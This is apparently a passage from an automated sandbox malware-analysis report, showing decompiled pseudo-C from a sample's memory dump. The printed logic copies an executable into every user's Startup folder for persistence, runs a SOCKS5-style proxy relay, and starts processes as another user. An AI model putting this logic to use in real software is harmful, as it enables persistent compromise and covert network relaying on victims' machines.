    • CloseHandle.KERNEL32(?), ref: 0040F8D0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
    • String ID:
    • API String ID: 561470431-3916222277
    • Opcode ID: fc35d0f2a6b0e39ddc484f75287a9a9850a765fa2851298bc798d6af90839615
    • Instruction ID: d88101fee22d02b781c5a5214e8f7285694ddfd058a9753d1bd1bdd84816f5d1
    • Opcode Fuzzy Hash: fc35d0f2a6b0e39ddc484f75287a9a9850a765fa2851298bc798d6af90839615
    • Instruction Fuzzy Hash: 0291B131508341AFD720EF608D85EAF7BE8AF84304F40493EF984A22E1C7798949DB5B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0040969D(void* __eflags) {
    				char _v5;
    				char* _v12;
    				char _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				char _v56;
    				char _v88;
    				char _v608;
    				short _v1128;
    				char _v1648;
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t63;
    				int _t69;
    				char _t70;
    				char _t76;
    				int _t80;
    				char _t81;
    				char _t82;
    				char _t86;
    				char _t88;
    				WCHAR* _t98;
    				int _t99;
    				CHAR* _t110;
    				char* _t111;
    				WCHAR* _t112;
    				struct HINSTANCE__* _t113;
    				signed int _t114;
    				void* _t115;
    
    				_t112 =  &_v56;
    				_v5 = 0;
    				E0040FA33(0xe1, _t112);
    				_t113 = LoadLibraryW(_t112);
    				if(_t113 == 0) {
    					L7:
    					return 0;
    				} else {
    					_t110 =  &_v88;
    					E0040F9FD(0xe2, _t110);
    					_t63 = GetProcAddress(_t113, _t110);
    					if(_t63 != 0) {
    						_push( &_v12);
    						_t106 =  &_v608;
    						_push( &_v608);
    						_v12 = 0x104;
    						if( *_t63() == 1) {
    							_t98 =  &_v1128;
    							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
    							if(_t98 == 0) {
    								_t106 =  &_v608;
    								_t99 = E00416EF7(_t106);
    								_v12 = _t99;
    								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
    									_t106 = _t115 + _v12 * 2 - 0x464;
    									E00416749(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
    									_v5 = 1;
    								}
    							}
    						}
    					}
    					FreeLibrary(_t113);
    					if(_v5 != 0) {
    						_v5 = 0;
    						_v28 = 0;
    						_t111 = L".exe";
    						do {
    							_v12 = 0;
    							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
    							_v24 = _t69;
    							__eflags = _t69;
    							if(_t69 == 0) {
    								L11:
    								__eflags = _v12;
    								if(_v12 == 0) {
    									goto L24;
    								}
    								_t114 = 0;
    								__eflags = _v20;
    								if(_v20 <= 0) {
    									L23:
    									NetApiBufferFree(_v12);
    									goto L24;
    								} else {
    									goto L13;
    								}
    								do {
    									L13:
    									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
    									__eflags = _t80;
    									if(_t80 == 0) {
    										_t81 = _v16;
    										__eflags = _t81;
    										if(_t81 != 0) {
    											_t106 =  &_v608;
    											_t82 = E0040E4C6( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
    											__eflags = _t82;
    											if(_t82 != 0) {
    												_t86 = E0041BC2F( &_v1128,  &_v608,  &_v608);
    												__eflags = _t86;
    												if(_t86 != 0) {
    													_t88 = E0041B9B1( &_v608);
    													__eflags = _t88;
    													if(_t88 != 0) {
    														__eflags = E0041A858(0,  &_v608,  &_v1648, _t111, 6);
    														if(__eflags != 0) {
    															__eflags = E00408D9C( &_v608, __eflags, 0,  &_v1648, 0);
    															if(__eflags != 0) {
    																_v5 = 1;
    																E00408EC9( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
    															}
    														}
    													}
    												}
    											}
    											NetApiBufferFree(_v16);
    										}
    									}
    									_t114 = _t114 + 1;
    									__eflags = _t114 - _v20;
    								} while (_t114 < _v20);
    								goto L23;
    							}
    							__eflags = _t69 - 0xea;
    							if(_t69 != 0xea) {
    								break;
    							}
    							goto L11;
    							L24:
    							__eflags = _v24 - 0xea;
    						} while (_v24 == 0xea);
    						_t70 =  &_v1128;
    						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
    						__eflags = _t70;
    						if(_t70 == 0) {
    							__eflags = E0041A858(0,  &_v1128,  &_v1648, _t111, 6);
    							if(__eflags != 0) {
    								_t76 = E00408D9C(_t106, __eflags, 0,  &_v1648, 0);
    								__eflags = _t76;
    								if(_t76 != 0) {
    									_v5 = 1;
    								}
    							}
    						}
    						return _v5;
    					}
    					goto L7;
    				}
    			}


    APIs
    • LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 004096BE
    • GetProcAddress.KERNEL32(00000000,?), ref: 004096DF
    • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00409710
    • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00409733
    • FreeLibrary.KERNEL32(00000000), ref: 0040975A
    • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 00409790
    • NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 004097C9
    • NetApiBufferFree.NETAPI32(?,?,?), ref: 00409862
    • NetApiBufferFree.NETAPI32(?), ref: 00409875
    • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00409899
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
    • String ID: .exe
    • API String ID: 1753652487-4119554291
    • Opcode ID: c6e7a88f488e9186a74ef96c2dc58423928d6ce12ce2fdb3197e43837b15b006
    • Instruction ID: 9d9262e4803212db9b5368070db02fb5b6626c9aaf9ba9f62b44393a68c558fa
    • Opcode Fuzzy Hash: c6e7a88f488e9186a74ef96c2dc58423928d6ce12ce2fdb3197e43837b15b006
    • Instruction Fuzzy Hash: CC615272910218AEDF10EB94CD84EEE777CAB05304F4045BAB651F3292E7399E498B58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 46%
    			E00406095(void* __eflags, char _a4) {
    				signed int _v9;
    				signed char _v13;
    				signed int _v14;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed char _v32;
    				intOrPtr _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				signed int _v52;
    				signed char _v53;
    				signed char _v55;
    				char _v56;
    				signed char _v60;
    				void* _v64;
    				signed int _v68;
    				signed int _v72;
    				signed int _v76;
    				char _v80;
    				char _v84;
    				char _v88;
    				signed char _v192;
    				char _v208;
    				signed char _v212;
    				signed int _v214;
    				signed int _v216;
    				char _v232;
    				signed int _v484;
    				intOrPtr _v488;
    				intOrPtr _v492;
    				signed int _v496;
    				signed char _v600;
    				signed char _v620;
    				short _v624;
    				signed short _v752;
    				char _v880;
    				char _v1000;
    				intOrPtr _v1004;
    				char _v1008;
    				char _v1264;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t254;
    				signed int _t262;
    				signed int _t263;
    				void* _t271;
    				signed int _t272;
    				signed int _t274;
    				void* _t276;
    				signed int _t277;
    				void* _t278;
    				signed char _t279;
    				signed int _t280;
    				void* _t283;
    				signed int _t284;
    				signed char _t286;
    				signed int _t287;
    				signed int _t291;
    				signed int _t296;
    				signed int _t312;
    				signed int _t314;
    				intOrPtr _t315;
    				void* _t317;
    				signed int _t319;
    				signed int _t321;
    				signed int _t323;
    				signed int _t324;
    				signed int _t326;
    				signed int _t331;
    				void* _t333;
    				signed short _t337;
    				signed int _t341;
    				signed int _t342;
    				signed short _t353;
    				signed int _t359;
    				signed int _t361;
    				signed char _t362;
    				signed int _t363;
    				void* _t364;
    				signed int _t366;
    				signed int _t367;
    				signed short _t371;
    				signed int _t384;
    				signed int _t388;
    				signed int _t390;
    				signed int _t393;
    				signed char _t394;
    				signed char _t395;
    				void* _t398;
    				signed int _t399;
    				void* _t400;
    				signed char _t401;
    				signed char _t403;
    				void* _t406;
    				void* _t407;
    				signed int _t408;
    				void* _t416;
    				char* _t417;
    				signed char _t419;
    				signed int _t422;
    				char* _t430;
    				intOrPtr _t441;
    				intOrPtr _t448;
    				signed char _t450;
    				signed char _t451;
    				void* _t454;
    				intOrPtr* _t455;
    				signed int _t457;
    				intOrPtr _t458;
    				signed int _t460;
    				intOrPtr _t463;
    				signed int _t465;
    				signed int _t466;
    				void* _t469;
    
    				_t452 = _a4;
    				_t254 = E00419960(_a4);
    				_t403 = 0;
    				_v44 = 0 | _t254 == 0x00000017;
    				if(E0041935B(1, _a4,  &_v9, 0) == 0 || _v9 == 0 || E0041935B(_v9 & 0x000000ff, _t452,  &_v880, 0) == 0) {
    					L46:
    					__eflags = 0;
    					return 0;
    				} else {
    					_t262 = _v9 & 0x000000ff;
    					L5:
    					L5:
    					if(_t262 != _t403) {
    						goto L4;
    					} else {
    						_t263 = 0;
    					}
    					L7:
    					asm("sbb eax, eax");
    					_v40 = ( ~_t263 & 0xffff0100) + 0x0000ff05 & 0x0000ffff;
    					if(E004193D2( &_v40, _t452,  &_v40, 2) == 0) {
    						goto L46;
    					}
    					if(_v40 == 0xff05) {
    						return 1;
    					}
    					_push(_t403);
    					_push( &_v56);
    					_t271 = 4;
    					_v13 = _t403;
    					_t272 = E0041935B(_t271, _t452);
    					__eflags = _t272;
    					if(_t272 == 0) {
    						goto L46;
    					} else {
    						__eflags = _v56 - 5;
    						if(_v56 != 5) {
    							goto L46;
    						}
    						__eflags = _v44 & 0x00000001;
    						_t457 = 0x17;
    						if((_v44 & 0x00000001) == 0) {
    							_v76 = 2;
    							_v72 = _t457;
    						} else {
    							_v76 = _t457;
    							_v72 = 2;
    						}
    						_t274 = (_v53 & 0x000000ff) - 1;
    						__eflags = _t274;
    						_v32 = _t403;
    						if(_t274 == 0) {
    							_push(_t403);
    							_push( &_v84);
    							_t276 = 4;
    							_t277 = E0041935B(_t276, _t452);
    							__eflags = _t277;
    							if(_t277 == 0) {
    								goto L46;
    							}
    							_t278 = 0x10;
    							_t279 = E00416378(_t278);
    							_v32 = _t279;
    							__eflags = _t279 - _t403;
    							if(_t279 != _t403) {
    								_t416 = 2;
    								 *_t279 = _t416;
    								_push(4);
    								_t417 =  &_v84;
    								_t280 = _t279 + 4;
    								__eflags = _t280;
    								goto L43;
    							}
    							goto L41;
    						} else {
    							_t384 = _t274;
    							__eflags = _t384;
    							if(_t384 == 0) {
    								_t388 = E0041935B(1, _t452,  &_v14, _t403);
    								__eflags = _t388;
    								if(_t388 == 0) {
    									goto L46;
    								}
    								__eflags = _v14 - _t403;
    								if(_v14 == _t403) {
    									goto L46;
    								}
    								_t390 = E0041935B(_v14 & 0x000000ff, _t452,  &_v1264, _t403);
    								__eflags = _t390;
    								if(_t390 == 0) {
    									goto L46;
    								}
    								 *(_t469 + (_v14 & 0x000000ff) - 0x4ec) = _t403;
    								_t393 =  &_v1264;
    								_v60 = _t403;
    								__imp__getaddrinfo(_t393, _t403, _t403,  &_v60);
    								__eflags = _t393;
    								if(_t393 == 0) {
    									_t451 = 0;
    									__eflags = 0;
    									do {
    										_t394 = _v60;
    										__eflags = _t394 - _t403;
    										if(_t394 == _t403) {
    											goto L32;
    										}
    										_t448 =  *((intOrPtr*)(_t469 + (_t451 & 0x000000ff) * 4 - 0x48));
    										while(1) {
    											__eflags =  *((intOrPtr*)(_t394 + 4)) - _t448;
    											if(__eflags == 0) {
    												break;
    											}
    											_t394 =  *(_t394 + 0x1c);
    											__eflags = _t394 - _t403;
    											if(_t394 != _t403) {
    												continue;
    											}
    											goto L32;
    										}
    										_t395 = E004163FB(__eflags,  *((intOrPtr*)(_t394 + 0x18)),  *((intOrPtr*)(_t394 + 0x10)));
    										_v32 = _t395;
    										__eflags = _t395 - _t403;
    										if(_t395 != _t403) {
    											__eflags =  *_t395 - _t457;
    											if( *_t395 == _t457) {
    												 *(_t395 + 0x18) = _t403;
    												 *(_t395 + 4) = _t403;
    											}
    										} else {
    											_v13 = 1;
    										}
    										L34:
    										__imp__freeaddrinfo(_v60);
    										goto L44;
    										L32:
    										_t451 = _t451 + 1;
    										__eflags = _t451 - 2;
    									} while (_t451 < 2);
    									_v13 = 4;
    									goto L34;
    								} else {
    									_v13 = 4;
    									L44:
    									_push(_t403);
    									_push( &_v64);
    									_t283 = 2;
    									_t284 = E0041935B(_t283, _t452);
    									__eflags = _t284;
    									if(_t284 != 0) {
    										_v9 = 1;
    										__eflags = _v13 - _t403;
    										if(_v13 != _t403) {
    											L145:
    											E004163A8(_v32);
    											_t286 = _v9;
    											__eflags = _t286 - 1;
    											if(_t286 != 1) {
    												L47:
    												return _t286;
    											}
    											__eflags = _v13;
    											if(_v13 == 0) {
    												goto L47;
    											}
    											_t287 = E00405F7D(_a4, 0xffffffff, _v13, _v44);
    											__eflags = _t287;
    											return _t287 & 0xffffff00 | _t287 != 0x00000000;
    										}
    										_t419 = _v32;
    										 *((short*)(_t419 + 2)) = _v64;
    										_t291 = (_v55 & 0x000000ff) - 1;
    										__eflags = _t291;
    										if(_t291 == 0) {
    											_t458 = E004193F0(_v32);
    											__eflags = _t458 - 0xffffffff;
    											if(_t458 != 0xffffffff) {
    												E004197A3(_t419, _t458);
    												_t294 = E00405F7D(_a4, _t458, _t403, _v44);
    												__eflags = _t294 - 1;
    												if(_t294 != 1) {
    													__eflags = _t294 - 0xffffffff;
    													if(_t294 != 0xffffffff) {
    														_v9 = _t403;
    													} else {
    														_v13 = 1;
    													}
    												} else {
    													_push(_t458);
    													_t294 = E004195A4(_a4);
    												}
    												L144:
    												E0041974B(_t294, _t458);
    												goto L145;
    											}
    											L138:
    											_v13 = 5;
    											goto L145;
    										}
    										_t296 = _t291 - 1;
    										__eflags = _t296;
    										if(_t296 == 0) {
    											__eflags =  *_t419 - 0x17;
    											 *((short*)(_t419 + 2)) = 0;
    											if( *_t419 != 0x17) {
    												 *(_t419 + 4) = _t403;
    											} else {
    												E0041645B(0, _t419, _t403, 0x10);
    											}
    											_t460 = E004194EA(_v32, 1);
    											_v48 = _t460;
    											__eflags = _t460 - 0xffffffff;
    											if(_t460 == 0xffffffff) {
    												goto L138;
    											} else {
    												_t454 = E00405F7D(_a4, _t460, _t403, _v44);
    												__eflags = _t454 - 1;
    												if(_t454 != 1) {
    													L134:
    													E0041974B(_t299, _t460);
    													__eflags = _t454 - 0xffffffff;
    													if(_t454 == 0xffffffff) {
    														L124:
    														_v13 = 1;
    														goto L145;
    													}
    													__eflags = _t454 - 1;
    													if(_t454 != 1) {
    														_v9 = 0;
    													}
    													goto L145;
    												}
    												_v20 = E0041971B( &_v48,  &_a4);
    												E0041974B(_t303, _v48);
    												__eflags = _v20 - 0xffffffff;
    												if(_v20 == 0xffffffff) {
    													goto L124;
    												}
    												E004197A3(_t419, _v20);
    												_t454 = E00405F7D(_a4, _v20, _t403, _v44 | 0x00000002);
    												__eflags = _t454 - 1;
    												if(_t454 == 1) {
    													_push(_v20);
    													_t299 = E004195A4(_a4);
    												}
    												_t460 = _v20;
    												goto L134;
    											}
    										}
    										__eflags = _t296 == 1;
    										if(_t296 == 1) {
    											_v80 = 0x80;
    											_v88 = 0x80;
    											_t312 =  &_v216;
    											__imp__#6(_a4, _t312,  &_v80);
    											__eflags = _t312;
    											if(_t312 != 0) {
    												goto L124;
    											}
    											_t314 =  &_v1008;
    											__imp__#5(_a4, _t314,  &_v88);
    											__eflags = _t314;
    											if(_t314 != 0) {
    												goto L124;
    											}
    											__eflags = _v216 - 0x17;
    											_v214 = _t314;
    											if(_v216 == 0x17) {
    												_v192 = _t403;
    												_v212 = _t403;
    											}
    											_t315 = E004197C8( &_v216);
    											_v36 = _t315;
    											__eflags = _t315 - 0xffffffff;
    											if(_t315 == 0xffffffff) {
    												goto L124;
    											} else {
    												_t455 = E00416378(0xffff);
    												__eflags = _t455 - _t403;
    												if(_t455 != _t403) {
    													_t463 = _a4;
    													_t317 = E00405F7D(_t463, _v36, _t403, _v44);
    													__eflags = _t317 - 1;
    													if(_t317 != 1) {
    														__eflags = _t317 - 0xffffffff;
    														if(_t317 != 0xffffffff) {
    															_v9 = _t403;
    														} else {
    															_v13 = 1;
    														}
    														L122:
    														_t294 = E004163A8(_t455);
    														L123:
    														_t458 = _v36;
    														goto L144;
    													}
    													_v28 = _v28 | 0xffffffff;
    													_v484 = _v484 | 0xffffffff;
    													_v48 = _t403;
    													_v20 = _t403;
    													_v40 = _t403;
    													_v496 = 2;
    													_v492 = _t463;
    													_v488 = _v36;
    													while(1) {
    														_t319 =  &_v496;
    														__imp__#18(_t403, _t319, _t403, _t403, _t403);
    														__eflags = _t319;
    														if(_t319 <= 0) {
    															break;
    														}
    														_t321 = E004192C5( &_v496, _a4);
    														__eflags = _t321;
    														if(_t321 == 0) {
    															L64:
    															_v24 = 0x80;
    															_t323 = E004192C5( &_v496, _v36);
    															__eflags = _t323;
    															if(_t323 == 0) {
    																L106:
    																__eflags = _v28 - 0xffffffff;
    																if(_v28 == 0xffffffff) {
    																	L115:
    																	_t403 = 0;
    																	__eflags = 0;
    																	L116:
    																	_t324 = _v28;
    																	__eflags = _t324 - 0xffffffff;
    																	_v484 = _t324;
    																	_t422 = (0 | _t324 != 0xffffffff) + 2;
    																	__eflags = _t422;
    																	_v496 = _t422;
    																	_v492 = _a4;
    																	_v488 = _v36;
    																	continue;
    																}
    																_t326 = E004192C5( &_v496, _v28);
    																__eflags = _t326;
    																if(_t326 == 0) {
    																	goto L115;
    																}
    																_t465 = _v48;
    																_t403 = 0;
    																_t331 = _t465 + _t455;
    																__imp__#17(_v28, _t331, 0xffff - _t465, 0,  &_v216,  &_v24);
    																__eflags = _t331;
    																if(_t331 > 0) {
    																	L110:
    																	 *_t455 = 0;
    																	 *((char*)(_t455 + 2)) = 0;
    																	_v216 - 0x17 = _v20 - 0x17;
    																	 *(_t455 + 3) = ((0 | _v216 != 0x00000017) - 0x00000001 & 0x00000003) + 1;
    																	if(_v20 != 0x17) {
    																		__eflags = _v20 - 2;
    																		if(_v20 != 2) {
    																			goto L116;
    																		}
    																		_push(4);
    																		_t430 =  &_v212;
    																		L114:
    																		_t198 = _t455 + 4; // 0x4
    																		E004163E4();
    																		_t333 = E004163E4(_t465 + _t455 - 2,  &_v214, 2);
    																		__imp__#20(_v36, _t455, _t333 + _t465, _t403,  &_v624, _v40, _t198, _t430);
    																		goto L116;
    																	}
    																	_push(0x10);
    																	_t430 =  &_v208;
    																	goto L114;
    																}
    																__eflags = _v20 - (_v216 & 0x0000ffff);
    																if(_v20 != (_v216 & 0x0000ffff)) {
    																	goto L116;
    																}
    																goto L110;
    															}
    															_t321 =  &_v216;
    															__imp__#17(_v36, _t455, 0xffff, _t403, _t321,  &_v24);
    															_t466 = _t321;
    															_v68 = _t466;
    															__eflags = _t466 - _t403;
    															if(_t466 <= _t403) {
    																break;
    															}
    															__eflags = _t466 - 6;
    															if(_t466 < 6) {
    																goto L106;
    															}
    															_t337 = _v216;
    															__eflags = _v1008 - _t337;
    															if(_v1008 != _t337) {
    																goto L106;
    															}
    															__eflags = _t337 - 2;
    															if(_t337 != 2) {
    																__eflags = _t337 - 0x17;
    																if(_t337 != 0x17) {
    																	L73:
    																	__eflags =  *((char*)(_t455 + 2));
    																	if( *((char*)(_t455 + 2)) != 0) {
    																		goto L106;
    																	}
    																	__eflags =  *_t455 - _t403;
    																	if( *_t455 != _t403) {
    																		goto L106;
    																	}
    																	__eflags = _v40 - _t403;
    																	if(_v40 == _t403) {
    																		E004163E4( &_v624,  &_v216, _v24);
    																		__eflags = _v624 - 0x17;
    																		if(_v624 == 0x17) {
    																			_v600 = _t403;
    																			_v620 = _t403;
    																		}
    																		_v40 = _v24;
    																	}
    																	E0041645B( &_v216,  &_v216, _t403, 0x80);
    																	_t341 = ( *(_t455 + 3) & 0x000000ff) - 1;
    																	__eflags = _t341;
    																	if(_t341 == 0) {
    																		__eflags = _t466 - 0xa;
    																		if(_t466 <= 0xa) {
    																			goto L106;
    																		}
    																		_t342 = 2;
    																		_v216 = _t342;
    																		_t156 = _t455 + 4; // 0x4
    																		_v24 = 0x10;
    																		E004163E4( &_v212, _t156, 4);
    																		_push(8);
    																		goto L99;
    																	} else {
    																		_t361 = _t341;
    																		__eflags = _t361;
    																		if(_t361 == 0) {
    																			_t362 =  *((intOrPtr*)(_t455 + 4));
    																			__eflags = _t362;
    																			if(_t362 == 0) {
    																				goto L106;
    																			}
    																			_t363 = _t362 & 0x000000ff;
    																			__eflags = _t466 - _t363 + 7;
    																			if(_t466 <= _t363 + 7) {
    																				goto L106;
    																			}
    																			_t133 = _t455 + 5; // 0x5
    																			_t364 = E004163E4( &_v880, _t133, _t363);
    																			 *((char*)(_t469 + _t364 - 0x36c)) = 0;
    																			_t137 = _t364 + 5; // 0x5
    																			_t406 = _t137;
    																			_v52 = 0;
    																			_t366 =  &_v880;
    																			__imp__getaddrinfo(_t366, 0, 0,  &_v52);
    																			__eflags = _t366;
    																			if(_t366 != 0) {
    																				goto L106;
    																			}
    																			_t450 = 0;
    																			__eflags = 0;
    																			do {
    																				_t367 = _v52;
    																				__eflags = _t367;
    																				if(_t367 == 0) {
    																					goto L92;
    																				}
    																				_t441 =  *((intOrPtr*)(_t469 + (_t450 & 0x000000ff) * 4 - 0x48));
    																				while(1) {
    																					__eflags =  *((intOrPtr*)(_t367 + 4)) - _t441;
    																					if( *((intOrPtr*)(_t367 + 4)) == _t441) {
    																						break;
    																					}
    																					_t367 =  *(_t367 + 0x1c);
    																					__eflags = _t367;
    																					if(_t367 != 0) {
    																						continue;
    																					}
    																					goto L92;
    																				}
    																				_v24 =  *((intOrPtr*)(_t367 + 0x10));
    																				E004163E4( &_v216,  *((intOrPtr*)(_t367 + 0x18)),  *((intOrPtr*)(_t367 + 0x10)));
    																				__eflags = _v216 - 0x17;
    																				if(_v216 == 0x17) {
    																					_v192 = 0;
    																					_v212 = 0;
    																				}
    																				__imp__freeaddrinfo(_v52);
    																				L100:
    																				_t407 = _t406 + 2;
    																				__eflags = _v28 - 0xffffffff;
    																				_v214 =  *((intOrPtr*)(_t406 + _t455));
    																				if(_v28 != 0xffffffff) {
    																					L103:
    																					__eflags = _v68 - _t407;
    																					if(_v68 > _t407) {
    																						__eflags = _v20 - (_v216 & 0x0000ffff);
    																						if(_v20 == (_v216 & 0x0000ffff)) {
    																							_t408 = _t407 + _t455;
    																							__eflags = _t408;
    																							__imp__#20(_v28, _t408, _v68 - _t407, 0,  &_v216, _v24);
    																						}
    																					}
    																					goto L106;
    																				}
    																				E0041645B( &_v752,  &_v752, 0, 0x80);
    																				_t353 = _v216;
    																				_v752 = _t353;
    																				_v20 = _t353 & 0x0000ffff;
    																				_t321 = E004197C8( &_v752);
    																				_v28 = _t321;
    																				__eflags = _t321 - 0xffffffff;
    																				if(_t321 == 0xffffffff) {
    																					goto L118;
    																				}
    																				__eflags = _v20 - 0x17;
    																				_t359 = ((0 | _v20 != 0x00000017) - 0x00000001 & 0x0000000c) + 0xa;
    																				__eflags = _t359;
    																				_v48 = _t359;
    																				goto L103;
    																				L92:
    																				_t450 = _t450 + 1;
    																				__eflags = _t450 - 2;
    																			} while (_t450 < 2);
    																			goto L106;
    																		}
    																		__eflags = _t361 != 1;
    																		if(_t361 != 1) {
    																			goto L106;
    																		}
    																		__eflags = _t466 - 0x16;
    																		if(_t466 <= 0x16) {
    																			goto L106;
    																		}
    																		_t371 = 0x17;
    																		_v216 = _t371;
    																		_t128 = _t455 + 4; // 0x4
    																		_v24 = 0x1c;
    																		E004163E4( &_v208, _t128, 0x10);
    																		_push(0x14);
    																		L99:
    																		_pop(_t406);
    																		goto L100;
    																	}
    																}
    																__eflags = E00416419( &_v208,  &_v1000, 0x10);
    																L72:
    																if(__eflags != 0) {
    																	goto L106;
    																}
    																goto L73;
    															}
    															__eflags = _v1004 - _v212;
    															goto L72;
    														}
    														__imp__#16(_a4, _t455, 0xffff, _t403);
    														__eflags = _t321;
    														if(_t321 <= 0) {
    															break;
    														}
    														goto L64;
    													}
    													L118:
    													E0041974B(_t321, _v28);
    													goto L122;
    												}
    												_v13 = 1;
    												goto L123;
    											}
    										}
    										_v13 = 7;
    										goto L145;
    									}
    									E004163A8(_v32);
    									goto L46;
    								}
    							}
    							__eflags = _t384 != 1;
    							if(_t384 != 1) {
    								goto L46;
    							}
    							_push(_t403);
    							_push( &_v232);
    							_t398 = 0x10;
    							_t399 = E0041935B(_t398, _t452);
    							__eflags = _t399;
    							if(_t399 == 0) {
    								goto L46;
    							}
    							_t400 = 0x1c;
    							_t401 = E00416378(_t400);
    							_v32 = _t401;
    							__eflags = _t401 - _t403;
    							if(_t401 == _t403) {
    								L41:
    								_v13 = 1;
    							} else {
    								 *_t401 = _t457;
    								_push(0x10);
    								_t417 =  &_v232;
    								_t280 = _t401 + 8;
    								L43:
    								_push(_t417);
    								_push(_t280);
    								E004163E4();
    							}
    							goto L44;
    						}
    					}
    					L4:
    					_t262 = _t262 - 1;
    					__eflags =  *(_t469 + _t262 - 0x36c) - _t403;
    					if( *(_t469 + _t262 - 0x36c) == _t403) {
    						_t263 = _t469 + _t262 - 0x36c;
    						goto L7;
    					}
    					goto L5;
    				}
    			}

    APIs
      • Part of subcall function 00419960: getsockname.WS2_32(?,?,?), ref: 0041997E
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0040623B
    • freeaddrinfo.WS2_32(?), ref: 00406278
    • getsockname.WS2_32(?,?,?), ref: 00406355
    • getpeername.WS2_32(?,?,?), ref: 00406371
      • Part of subcall function 0041935B: recv.WS2_32(?,?,00000001,00000000), ref: 0041937F
    • recv.WS2_32(?,00000000,0000FFFF,00000000), ref: 00406433
    • recvfrom.WS2_32(?,00000000,0000FFFF,00000000,00000017,00000080), ref: 00406473
    • getaddrinfo.WS2_32(00000000,00000000,00000000,?), ref: 004065C4
    • freeaddrinfo.WS2_32(?,00000017,000000FF,?), ref: 0040662B
    • sendto.WS2_32(000000FF,00000006,?,00000000,00000017,00000010), ref: 004066F0
    • recvfrom.WS2_32(000000FF,0000FFFF,0000FFFF,00000000,00000017,00000080), ref: 00406736
    • sendto.WS2_32(?,00000000,00000000,00000000,?,?), ref: 004067B6
    • select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 004067F7
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: freeaddrinfogetaddrinfogetsocknamerecvrecvfromsendto$getpeernameselect
    • String ID:
    • API String ID: 3747714436-0
    • Opcode ID: 01d8fe55f2997c812acc76f2d695a4be4ef4a1c57136e4876ec3400d570d6e5a
    • Instruction ID: 61da10105d9ead6b3157467ca42ce45605a95d001ea92bb118dbe0d971dae729
    • Opcode Fuzzy Hash: 01d8fe55f2997c812acc76f2d695a4be4ef4a1c57136e4876ec3400d570d6e5a
    • Instruction Fuzzy Hash: 3042C371800119ABCF20AFA4CC41BEEBBB9AF04304F0545BBE516B72D1D3398E95DB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E00417CCA(void* _a4, WCHAR* _a8) {
    				WCHAR* _v5;
    				char _v12;
    				signed int _v16;
    				struct HINSTANCE__* _v20;
    				_Unknown_base(*)()* _v24;
    				struct _PROCESS_INFORMATION _v40;
    				struct _STARTUPINFOW _v108;
    				struct HINSTANCE__* _t28;
    				_Unknown_base(*)()* _t31;
    				WCHAR* _t49;
    				long _t50;
    				intOrPtr* _t52;
    
    				_v5 = 0;
    				_t28 = LoadLibraryA("userenv.dll");
    				_v20 = _t28;
    				if(_t28 != 0) {
    					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
    					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
    					_v24 = _t31;
    					if(_t52 != 0 && _t31 != 0) {
    						_push(0);
    						_push(_a4);
    						_push( &_v16);
    						_v16 = 0;
    						if( *_t52() == 0) {
    							_v16 = 0;
    						}
    						_t50 = 0x44;
    						_v12 = 0;
    						E0041645B( &_v108,  &_v108, 0, _t50);
    						_t49 = _a8;
    						_v108.cb = _t50;
    						_v108.lpDesktop = 0;
    						if(_t49 == 0) {
    							_t49 =  &_v12;
    						}
    						asm("sbb eax, eax");
    						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
    							CloseHandle(_v40.hThread);
    							CloseHandle(_v40);
    							_v5 = _v40.dwProcessId != 0;
    						}
